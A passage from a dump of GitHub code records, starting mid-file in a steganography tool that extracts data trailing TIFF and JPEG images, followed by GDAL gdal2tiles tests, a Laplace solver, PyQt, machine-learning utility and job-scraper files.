tiff magic numbers\")\n return\n \n # Read header\n ifd = unpack(fmt,steg[4:8])[0]\n \n # Read the number of tags\n nEntries = unpack(fmt_s,steg[ifd:ifd+2])[0]\n \n # We want to find the maximum address\n # Right now our max address is the end of the IFD block\n maxAddr = ifd + (nEntries*0xc) + 2\n \n # Loop through the tags\n for i in range(nEntries):\n # Figure out our current file location\n curAddr = ifd + 2 + (i * 0xc)\n\n tag = unpack(fmt_s,steg[curAddr:curAddr+2])[0]\n tagType = unpack(fmt_s,steg[curAddr+2:curAddr+4])[0]\n count = unpack(fmt,steg[curAddr+4:curAddr+8])[0]\n \n # print(\"Tag: {0}\\nType: {1}\".format(tag,tagType))\n\n # Tag types of ASCII and Unknown both have offsets associated\n if tagType == 2 or tagType == 7:\n offset = unpack(fmt,steg[curAddr+8:curAddr+0xc])[0]\n # See if we have a new winner\n if (offset + count) > maxAddr:\n maxAddr = offset + count\n #print(\"New max offset\")\n # print(\"Found new offset: {0}\".format(hex(offset)))\n\n # See if we have data hiding at the end\n if len(steg) > maxAddr:\n print(\"Trailing Data Discovered... Saving\")\n print(steg[maxAddr:])\n with open(output_file,\"wb\") as outFile:\n outFile.write(steg[maxAddr:])\n\n\ndef jpeg(image):\n\n # Official specs here: http://www.w3.org/Graphics/JPEG/itu-t81.pdf \n\n # Index for marching through the file \n i = 0\n \n # These markers don't have a length attribute\n nonLenMarkers = [ b'\\xff\\xd8', b'\\xff\\x01', b'\\xffd0', b'\\xffd1', b'\\xffd2', b'\\xffd3', b'\\xffd4', b'\\xffd5', b'\\xffd6', b'\\xffd7' ]\n\n # Open up the file\n with open(image.veritas.file_name,\"rb\") as myFile:\n steg = myFile.read()\n \n while True:\n # Grab the current header\n hdr = steg[i:i+2]\n \n # TODO: Add py logging here\n #print(\"Found Header: {0}\".format(hdr))\n \n # if Start of Image, Temporary Private, Restart, things that don't have an associated length field\n if hdr in nonLenMarkers:\n # Just move to the next marker\n i = i + 2\n continue\n \n # If we've found our way to the end of the jpeg\n if hdr == b'\\xff\\xd9':\n #print(\"Made it to the end!\")\n # Increment 2 so we can check the length\n i += 2\n break\n \n # Unpack the length field\n ln = unpack(\">H\",steg[i+2:i+4])[0]\n \n # print(\"Found Length: {0}\".format(ln))\n \n # Update the index with the known length\n i = i+ln+2\n \n # When we hit scan data, we scan to the end of the format\n if hdr == b'\\xff\\xda':\n #print(\"Start of Scan data\")\n # Find the end marker\n i += steg[i:].index(b'\\xff\\xd9')\n \n # Check for trailers\n if i != len(steg):\n print(\"Trailing Data Discovered... Saving\")\n print(steg[i:])\n # Save it off for reference\n with open(output_file, \"wb\") as outFile:\n outFile.write(steg[i:])\n","repo_name":"bannsec/stegoVeritas","sub_path":"stegoveritas/modules/image/analysis/trailing.py","file_name":"trailing.py","file_ext":"py","file_size_in_byte":6679,"program_lang":"python","lang":"en","doc_type":"code","stars":310,"dataset":"github-code","pt":"19"} +{"seq_id":"24119979507","text":"import torch\nimport numpy as np\n\n\ndef get_solution(input_T, isNeum, dtype = torch.FloatTensor):\n \"FDM method to solve laplace eqn\"\n \n maxIter = 1e8\n padT = input_T[0,0,:,:].numpy()\n output_T = input_T.clone().numpy()\n # READ NEUMANN BC FROM INPUT_T\n if isNeum[0]:\n nbc_left = padT[2:-2,0]\n# print(nbc_left)\n if isNeum[1]:\n nbc_upper = padT[0,2:-2]\n if isNeum[2]:\n nbc_right = padT[2:-2,-1]\n if isNeum[3]:\n nbc_bottom = padT[-1,2:-2]\n \n # Acquire the real compute domain of T \n T = padT[1:-1,1:-1]\n L = 1\n h = L / np.size(padT[0,:])\n T_new = np.copy(T)\n iteration = 0\n while iteration < maxIter:\n T_new[1:-1, 1:-1] = ((T_new[0:-2, 1:-1] + T_new[2:, 1:-1]) + (T_new[1:-1,0:-2] + T_new[1:-1, 2:]))*0.25\n if isNeum[0]:\n T_new[1:-1,0] = 1/3 * (4*T_new[1:-1,1] - T_new[1:-1, 2] - 2*h*nbc_left) \n err = (T_new - T).flat\n err = np.sqrt(np.dot(err,err))\n if err <= 1e-12:\n output_T[0,0,1:-1,1:-1] = T_new\n return torch.from_numpy(output_T).type(dtype)\n T = np.copy(T_new)\n iteration += 1\n output_T[0,0,1:-1,1:-1] = T_new \n return torch.from_numpy(output_T).type(dtype)\n","repo_name":"Yaling-Liu-Lab/Generate_CFD_by_DL","sub_path":"UNet_neum/get_solution.py","file_name":"get_solution.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"70594740204","text":"from gui.DataStorage import DataStorage\nfrom gui.jobs.Job import Job\nfrom hosts.HostInterface import HostInterface\n\n\nclass LocalComputer(HostInterface):\n \"\"\"\n A class representing the local computer\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Constructor\n :param kwargs: the remaining arguments\n \"\"\"\n self.tool = DataStorage.get(\"tool\")\n self.window = DataStorage.get(\"window\")\n self.conf = DataStorage.get(\"conf\")\n\n def train(self, agent, env, project_name):\n \"\"\"\n Train the agent in the environment\n :param agent: the agent\n :param env: the environment\n :param project_name: the name of the project for which the agent is trained\n \"\"\"\n job = Job.create_on_local_computer(self.window.filesystem_mutex, agent, env, project_name, {\n \"host\": \"local computer\",\n \"hardware\": \"cpu\"\n }, forward_mutex=False)\n if job is None:\n return\n agent = project_name + f\"/agents/{agent}\"\n env = project_name + f\"/environments/{env}\"\n self.window.pool.submit(job, agent=agent, env=env, projects_directory=self.conf.projects_directory)\n\n def retrieve_analysis_files(self, job_json):\n \"\"\"\n Retrieve the analysis files\n :param job_json: the json describing the job whose analysis must be retrieved\n \"\"\"\n pass\n","repo_name":"ChampiB/Deep_Active_Inference_Analysis","sub_path":"hosts/impl/LocalComputer.py","file_name":"LocalComputer.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"38151417547","text":"import glob\nimport os\nimport os.path\nimport shutil\nimport sys\n\nimport pytest\nimport test_py_scripts # noqa # pylint: disable=E0401\n\nfrom osgeo import gdal # noqa\nfrom osgeo_utils.gdalcompare import compare_db\n\npytestmark = pytest.mark.skipif(\n test_py_scripts.get_py_script(\"gdal2tiles\") is None,\n reason=\"gdal2tiles not available\",\n)\n\n\n@pytest.fixture()\ndef script_path():\n return test_py_scripts.get_py_script(\"gdal2tiles\")\n\n\ndef _verify_raster_band_checksums(filename, expected_cs=[]):\n ds = gdal.Open(filename)\n if ds is None:\n pytest.fail('cannot open output file \"%s\"' % filename)\n\n got_cs = [ds.GetRasterBand(i + 1).Checksum() for i in range(ds.RasterCount)]\n if isinstance(expected_cs[0], list):\n assert got_cs in expected_cs\n else:\n assert got_cs == expected_cs\n\n ds = None\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_simple(script_path):\n\n shutil.copy(\n test_py_scripts.get_data_path(\"gdrivers\") + \"small_world.tif\",\n \"tmp/out_gdal2tiles_smallworld.tif\",\n )\n\n os.chdir(\"tmp\")\n test_py_scripts.run_py_script(\n script_path, \"gdal2tiles\", \"-q out_gdal2tiles_smallworld.tif\"\n )\n os.chdir(\"..\")\n\n os.unlink(\"tmp/out_gdal2tiles_smallworld.tif\")\n\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.png\",\n expected_cs=[31420, 32522, 16314, 17849],\n )\n\n for filename in [\n \"googlemaps.html\",\n \"leaflet.html\",\n \"openlayers.html\",\n \"tilemapresource.xml\",\n ]:\n assert os.path.exists(\"tmp/out_gdal2tiles_smallworld/\" + filename), (\n \"%s missing\" % filename\n )\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_zoom_option(script_path):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n # Because of multiprocessing, run as external process, to avoid issues with\n # Ubuntu 12.04 and socket.setdefaulttimeout()\n # as well as on Windows that doesn't manage to fork\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-q --force-kml --processes=2 -z 0-1 \"\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld\",\n )\n\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/1/0/0.png\",\n expected_cs=[24063, 23632, 14707, 17849],\n )\n\n assert not os.path.exists(\"tmp/out_gdal2tiles_smallworld/0/0/0.png.aux.xml\")\n assert not os.path.exists(\"tmp/out_gdal2tiles_smallworld/1/0/0.png.aux.xml\")\n\n if gdal.GetDriverByName(\"KMLSuperOverlay\") is None:\n pytest.skip(\"KMLSuperOverlay driver missing\")\n\n ds = gdal.Open(\"tmp/out_gdal2tiles_smallworld/doc.kml\")\n assert ds is not None, \"did not get kml\"\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_resampling_option(script_path):\n\n resampling_list = [\n \"average\",\n \"near\",\n \"bilinear\",\n \"cubic\",\n \"cubicspline\",\n \"lanczos\",\n \"antialias\",\n \"mode\",\n \"max\",\n \"min\",\n \"med\",\n \"q1\",\n \"q3\",\n ]\n try:\n import numpy\n from PIL import Image\n\n import osgeo.gdal_array as gdalarray\n\n del Image, numpy, gdalarray\n except ImportError:\n # 'antialias' resampling is not available\n resampling_list.remove(\"antialias\")\n\n out_dir = \"tmp/out_gdal2tiles_smallworld\"\n\n for resample in resampling_list:\n\n shutil.rmtree(out_dir, ignore_errors=True)\n\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-q --resampling={0} {1} {2}\".format(\n resample,\n test_py_scripts.get_data_path(\"gdrivers\") + \"small_world.tif\",\n out_dir,\n ),\n )\n\n # very basic check\n ds = gdal.Open(\"tmp/out_gdal2tiles_smallworld/0/0/0.png\")\n if ds is None:\n pytest.fail(\"resample option {0!r} failed\".format(resample))\n ds = None\n\n shutil.rmtree(out_dir, ignore_errors=True)\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_xyz(script_path):\n\n try:\n shutil.copy(\n test_py_scripts.get_data_path(\"gdrivers\") + \"small_world.tif\",\n \"tmp/out_gdal2tiles_smallworld_xyz.tif\",\n )\n\n os.chdir(\"tmp\")\n ret = test_py_scripts.run_py_script(\n script_path,\n \"gdal2tiles\",\n \"-q --xyz --zoom=0-1 out_gdal2tiles_smallworld_xyz.tif\",\n )\n os.chdir(\"..\")\n\n assert \"ERROR ret code\" not in ret\n\n os.unlink(\"tmp/out_gdal2tiles_smallworld_xyz.tif\")\n\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld_xyz/0/0/0.png\",\n expected_cs=[31747, 33381, 18447, 17849],\n )\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld_xyz/1/0/0.png\",\n expected_cs=[15445, 16942, 13681, 17849],\n )\n\n for filename in [\"googlemaps.html\", \"leaflet.html\", \"openlayers.html\"]:\n assert os.path.exists(\"tmp/out_gdal2tiles_smallworld_xyz/\" + filename), (\n \"%s missing\" % filename\n )\n assert not os.path.exists(\n \"tmp/out_gdal2tiles_smallworld_xyz/tilemapresource.xml\"\n )\n finally:\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_xyz\")\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_invalid_srs(script_path):\n \"\"\"\n Case where the input image is not georeferenced, i.e. it's missing the SRS info,\n and no --s_srs option is provided. The script should fail validation and terminate.\n \"\"\"\n\n shutil.copy(\n test_py_scripts.get_data_path(\"gdrivers\") + \"test_nosrs.vrt\",\n \"tmp/out_gdal2tiles_test_nosrs.vrt\",\n )\n shutil.copy(test_py_scripts.get_data_path(\"gdrivers\") + \"byte.tif\", \"tmp/byte.tif\")\n\n os.chdir(\"tmp\")\n # try running on image with missing SRS\n ret = test_py_scripts.run_py_script(\n script_path, \"gdal2tiles\", \"-q --zoom=0-1 out_gdal2tiles_test_nosrs.vrt\"\n )\n\n # this time pass the spatial reference system via cli options\n ret2 = test_py_scripts.run_py_script(\n script_path,\n \"gdal2tiles\",\n \"-q --zoom=0-1 --s_srs EPSG:4326 out_gdal2tiles_test_nosrs.vrt\",\n )\n os.chdir(\"..\")\n\n os.unlink(\"tmp/out_gdal2tiles_test_nosrs.vrt\")\n os.unlink(\"tmp/byte.tif\")\n shutil.rmtree(\"tmp/out_gdal2tiles_test_nosrs\")\n\n assert \"ERROR ret code = 2\" in ret\n assert \"ERROR ret code\" not in ret2\n\n\ndef test_does_not_error_when_source_bounds_close_to_tiles_bound(script_path):\n \"\"\"\n Case where the border coordinate of the input file is inside a tile T but the first pixel is\n actually assigned to the tile next to T (nearest neighbour), meaning that when the query is done\n to get the content of T, nothing is returned from the raster.\n \"\"\"\n in_files = [\n \"./data/test_bounds_close_to_tile_bounds_x.vrt\",\n \"./data/test_bounds_close_to_tile_bounds_y.vrt\",\n ]\n out_folder = \"tmp/out_gdal2tiles_bounds_approx\"\n try:\n shutil.rmtree(out_folder)\n except Exception:\n pass\n\n try:\n for in_file in in_files:\n test_py_scripts.run_py_script(\n script_path, \"gdal2tiles\", \"-q -z 21-21 %s %s\" % (in_file, out_folder)\n )\n except TypeError:\n pytest.fail(\n \"Case of tile not getting any data not handled properly \"\n \"(tiles at the border of the image)\"\n )\n\n\ndef test_does_not_error_when_nothing_to_put_in_the_low_zoom_tile(script_path):\n \"\"\"\n Case when the highest zoom level asked is actually too low for any pixel of the raster to be\n selected\n \"\"\"\n in_file = \"./data/test_bounds_close_to_tile_bounds_x.vrt\"\n out_folder = \"tmp/out_gdal2tiles_bounds_approx\"\n try:\n shutil.rmtree(out_folder)\n except OSError:\n pass\n\n try:\n test_py_scripts.run_py_script(\n script_path, \"gdal2tiles\", \"-q -z 10 %s %s\" % (in_file, out_folder)\n )\n except TypeError:\n pytest.fail(\n \"Case of low level tile not getting any data not handled properly \"\n \"(tile at a zoom level too low)\"\n )\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_handle_utf8_filename(script_path):\n input_file = \"data/test_utf8_漢字.vrt\"\n\n out_folder = \"tmp/utf8_test\"\n\n try:\n shutil.rmtree(out_folder)\n except OSError:\n pass\n\n args = f\"-q -z 21 {input_file} {out_folder}\"\n\n test_py_scripts.run_py_script(script_path, \"gdal2tiles\", args)\n\n openlayers_html = open(\n os.path.join(out_folder, \"openlayers.html\"), \"rt\", encoding=\"utf-8\"\n ).read()\n assert \"test_utf8_漢字.vrt\" in openlayers_html\n\n try:\n shutil.rmtree(out_folder)\n except OSError:\n pass\n\n\ndef test_gdal2tiles_py_cleanup():\n\n lst = [\"tmp/out_gdal2tiles_smallworld\", \"tmp/out_gdal2tiles_bounds_approx\"]\n for filename in lst:\n try:\n shutil.rmtree(filename)\n except Exception:\n pass\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_exclude_transparent_tiles(script_path):\n\n output_folder = \"tmp/test_exclude_transparent_tiles\"\n os.makedirs(output_folder)\n\n try:\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-x -z 14-16 data/test_gdal2tiles_exclude_transparent.tif %s\"\n % output_folder,\n )\n\n # First row totally transparent - no tiles\n tiles_folder = os.path.join(output_folder, \"15\", \"21898\")\n dir_files = os.listdir(tiles_folder)\n assert not dir_files, \"Generated empty tiles for row 21898: %s\" % dir_files\n\n # Second row - only 2 non-transparent tiles\n tiles_folder = os.path.join(output_folder, \"15\", \"21899\")\n dir_files = sorted(os.listdir(tiles_folder))\n assert [\"22704.png\", \"22705.png\"] == dir_files, (\n \"Generated empty tiles for row 21899: %s\" % dir_files\n )\n\n # Third row - only 1 non-transparent tile\n tiles_folder = os.path.join(output_folder, \"15\", \"21900\")\n dir_files = os.listdir(tiles_folder)\n assert [\"22705.png\"] == dir_files, (\n \"Generated empty tiles for row 21900: %s\" % dir_files\n )\n\n finally:\n shutil.rmtree(output_folder)\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_profile_raster(script_path):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-q -p raster -z 0-1 \"\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld\",\n )\n\n try:\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.png\",\n expected_cs=[10125, 10802, 27343, 48852],\n )\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/1/0/0.png\",\n expected_cs=[62125, 59756, 43894, 38539],\n )\n\n if gdal.GetDriverByName(\"KMLSuperOverlay\") is None:\n pytest.skip(\"KMLSuperOverlay driver missing\")\n\n if sys.platform != \"win32\":\n # For some reason, the checksums on the kml file on Windows are the ones of the below png\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.kml\",\n expected_cs=[29839, 34244, 42706, 64319],\n )\n finally:\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_profile_raster_oversample(script_path):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-q -p raster -z 0-2 \"\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld\",\n )\n\n assert os.path.exists(\"tmp/out_gdal2tiles_smallworld/2/0/0.png\")\n assert os.path.exists(\"tmp/out_gdal2tiles_smallworld/2/3/1.png\")\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/2/0/0.png\",\n expected_cs=[[51434, 55441, 63427, 17849], [51193, 55320, 63324, 17849]], # icc\n )\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/2/3/1.png\",\n expected_cs=[[44685, 45074, 50871, 56563], [44643, 45116, 50863, 56563]], # icc\n )\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_profile_raster_xyz(script_path):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-q -p raster --xyz -z 0-1 \"\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld\",\n )\n\n try:\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.png\",\n expected_cs=[11468, 10719, 27582, 48827],\n )\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/1/0/0.png\",\n expected_cs=[60550, 62572, 46338, 38489],\n )\n\n if gdal.GetDriverByName(\"KMLSuperOverlay\") is None:\n pytest.skip(\"KMLSuperOverlay driver missing\")\n\n if sys.platform != \"win32\":\n # For some reason, the checksums on the kml file on Windows are the ones of the below png\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.kml\",\n expected_cs=[27644, 31968, 38564, 64301],\n )\n\n finally:\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_profile_geodetic_tmscompatible_xyz(script_path):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-q -p geodetic --tmscompatible --xyz -z 0-1 \"\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld\",\n )\n\n try:\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.png\",\n expected_cs=[8560, 8031, 7209, 17849],\n )\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/1/0/0.png\",\n expected_cs=[2799, 3468, 8686, 17849],\n )\n\n if gdal.GetDriverByName(\"KMLSuperOverlay\") is None:\n pytest.skip(\"KMLSuperOverlay driver missing\")\n\n if sys.platform != \"win32\":\n # For some reason, the checksums on the kml file on Windows are the ones of the below png\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.kml\",\n expected_cs=[12361, 18212, 21827, 5934],\n )\n\n finally:\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_mapml(script_path):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_mapml\", ignore_errors=True)\n\n gdal.Translate(\n \"tmp/byte_APS.tif\",\n test_py_scripts.get_data_path(\"gcore\") + \"byte.tif\",\n options=\"-a_srs EPSG:5936 -a_ullr 0 40 40 0\",\n )\n\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n '-q -p APSTILE -w mapml -z 16-18 --url \"https://foo\" tmp/byte_APS.tif tmp/out_gdal2tiles_mapml',\n )\n\n mapml = open(\"tmp/out_gdal2tiles_mapml/mapml.mapml\", \"rb\").read().decode(\"utf-8\")\n # print(mapml)\n assert '' in mapml\n assert '' in mapml\n assert (\n ''\n in mapml\n )\n assert (\n ''\n in mapml\n )\n assert (\n ''\n in mapml\n )\n\n shutil.rmtree(\"tmp/out_gdal2tiles_mapml\", ignore_errors=True)\n gdal.Unlink(\"tmp/byte_APS.tif\")\n\n\ndef _convert_png_to_webp(frm, to, quality):\n src_ds = gdal.Open(frm)\n driver = gdal.GetDriverByName(\"WEBP\")\n driver.CreateCopy(to, src_ds, 0, options=[\"LOSSLESS=True\"])\n\n\ndef _run_webp_test(script_path, resampling):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_png\", ignore_errors=True)\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_webp_from_png\", ignore_errors=True)\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_webp\", ignore_errors=True)\n\n base_args = \"-q --processes=2 -z 0-1 -r \" + resampling + \" \"\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n base_args\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld_png\",\n )\n\n quality = 50\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n base_args\n + \"--tiledriver=WEBP --webp-lossless \"\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld_webp\",\n )\n\n to_convert = glob.glob(\"tmp/out_gdal2tiles_smallworld_png/*/*/*.png\")\n for filename in to_convert:\n to_filename = filename.replace(\n \"tmp/out_gdal2tiles_smallworld_png/\",\n \"tmp/out_gdal2tiles_smallworld_webp_from_png/\",\n )\n to_filename = to_filename.replace(\".png\", \".webp\")\n to_folder = os.path.dirname(to_filename)\n os.makedirs(to_folder, exist_ok=True)\n\n _convert_png_to_webp(filename, to_filename, quality)\n\n to_compare = glob.glob(\"tmp/out_gdal2tiles_smallworld_webp_from_png/*/*/*.webp\")\n for filename in to_compare:\n webp_filename = filename.replace(\n \"tmp/out_gdal2tiles_smallworld_webp_from_png/\",\n \"tmp/out_gdal2tiles_smallworld_webp/\",\n )\n diff_found = compare_db(gdal.Open(webp_filename), gdal.Open(filename))\n assert not diff_found, (resampling, filename)\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_png\", ignore_errors=True)\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_webp_from_png\", ignore_errors=True)\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_webp\", ignore_errors=True)\n\n\n@pytest.mark.require_driver(\"WEBP\")\ndef test_gdal2tiles_py_webp(script_path):\n\n _run_webp_test(script_path, \"average\")\n try:\n import numpy\n from PIL import Image\n\n import osgeo.gdal_array as gdalarray\n\n del Image, numpy, gdalarray\n pil_available = True\n except ImportError:\n pil_available = False\n\n if pil_available:\n _run_webp_test(script_path, \"antialias\")\n","repo_name":"OSGeo/gdal","sub_path":"autotest/pyscripts/test_gdal2tiles.py","file_name":"test_gdal2tiles.py","file_ext":"py","file_size_in_byte":19103,"program_lang":"python","lang":"en","doc_type":"code","stars":4154,"dataset":"github-code","pt":"19"} +{"seq_id":"24462766300","text":"from PyQt5.QtWidgets import QWidget, QVBoxLayout, QTabWidget\n\n\n# klasa służąca do stworzenia kart do przełączania się pomiędzy mapą a wykresem\nclass Tabs(QWidget):\n def __init__(self, chart, map):\n super().__init__()\n self.__chart = chart\n self.__map = map\n\n # ustawienie układu jako poziomy układ\n self.layout = QVBoxLayout(self)\n # stworzenie obiektów\n self.tabs = QTabWidget()\n self.tab1 = QWidget()\n self.tab2 = QWidget()\n self.tabs.resize(100, 100)\n # stworzenie dwóch kart\n self.tabs.addTab(self.tab1, \"Wykres\")\n self.tabs.addTab(self.tab2, \"Mapa\")\n self.tab1.layout = QVBoxLayout()\n # ustawienie w pierwszej karcie wykeresu\n self.tab1.layout.addWidget(self.__chart)\n self.tab1.setLayout(self.tab1.layout)\n self.tab2.layout = QVBoxLayout()\n # ustawienie w drugiej karcie mapy\n self.tab2.layout.addWidget(self.__map)\n self.tab2.setLayout(self.tab2.layout)\n self.layout.addWidget(self.tabs)\n self.setLayout(self.layout)\n","repo_name":"Piotreksaw/projektPO","sub_path":"glowne_pliki/main/tabs.py","file_name":"tabs.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21956641153","text":"import numpy as np\nfrom sklearn.decomposition import PCA, FastICA\nfrom sklearn.random_projection import GaussianRandomProjection\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ndef split(X, Y, test_frac=0.1):\n\t# Split data\n\tcutoff = int(test_frac * len(Y))\n\tix = np.arange(0, len(Y))\n\tnp.random.shuffle(ix)\n\ttest_index = ix[:cutoff]\n\ttrain_index = ix[cutoff:]\n\tX_train, X_test = X.iloc[train_index], X.iloc[test_index]\n\tY_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]\n\n\treturn X_train, X_test, Y_train, Y_test\n\n\ndef transform4(X, Y, pca_num, ica_num, rca_num, rf_num):\n\t# Dimension Reduction and transforming data to fit\n\tpca = PCA(n_components=pca_num)\n\tX_pca = pca.fit_transform(X)\n\n\tica = FastICA(n_components=ica_num)\n\tX_ica = ica.fit_transform(X)\n\n\trca = GaussianRandomProjection(n_components=rca_num)\n\tX_rca = rca.fit_transform(X)\n\n\trf = RandomForestClassifier(n_estimators=100, max_depth=5, n_jobs=-1)\n\trf.fit(X, Y)\n\timportances = rf.feature_importances_\n\tsorted_impt = np.argsort(importances)[::-1] # Sorted in dec order\n\tX_rf = X.iloc[:, sorted_impt[:rf_num]]\n\n\treturn X_pca, X_ica, X_rca, X_rf","repo_name":"isw4/ML03-Unsupervised-Learning","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7243874384","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExample of function header for PHYS20161\n\nCode consists of single function that outputs roots of second order polynomial.\nAlso shows how line breaks should be taken over mathematical operations.\n\nLloyd Cawthorne 29/01/20\n\n\"\"\"\n\nimport math\n\n\ndef square_root(x_squared_coefficient, x_coefficient, constant):\n \"\"\"\n Returns the two roots of a second order polymial.\n\n Coefficients should be given to conform to\n\n x_squared_coefficient x^2 + x_coefficient x + constant = 0.\n\n x = (-x_coefficient +/- sqrt[x_coefficient^2 - 4 x_squared_ coeffiecient\n * constant]) / (2\n * x_squared_coefficient)\n\n Args:\n x_squared_coefficient: float\n x_coefficient: float\n constant: float\n Returns:\n Two solutions in a list: [float, float]\n Raises:\n ZeroDivisionError: If x_squared_coefficient = 0\n ValueError: Math domain error, imaginary solution\n\n L. Cawthorne 05/02/20\n \"\"\"\n\n try:\n square_root_term = math.sqrt(x_coefficient**2 - 4\n * x_squared_coefficient\n * constant)\n solution_1 = ((-x_coefficient + square_root_term)\n / (2 * x_squared_coefficient))\n solution_2 = ((-x_coefficient - square_root_term)\n / (2 * x_squared_coefficient))\n return [solution_1, solution_2]\n except ZeroDivisionError:\n print('x_squared_coefficient cannot be 0.')\n return None\n except ValueError:\n print('No real solutions.')\n return None\n","repo_name":"clead6/python-programming","sub_path":"Style Guide/square_root_header.py","file_name":"square_root_header.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12229394109","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_last_page_s(url):\n results = requests.get(url).text\n soup = BeautifulSoup(results, 'html.parser')\n pages = (soup.find_all(class_=\"s-pagination--item\"))\n return int(pages[-2].text.strip())\n\n\ndef find_jobs_s(url):\n db = []\n results = requests.get(url).text\n soup = BeautifulSoup(results, 'html.parser')\n jobs = soup.find_all(class_=\"grid--cell fl1\")\n for job in jobs:\n link = job.find(\"a\")\n if link:\n title = link[\"title\"]\n company = job.find(\n class_=\"fc-black-700 fs-body1 mb4\").find(\"span\").text.strip()\n url_link = \"https://stackoverflow.com\" + link[\"href\"]\n db.append((title, company, url_link))\n return 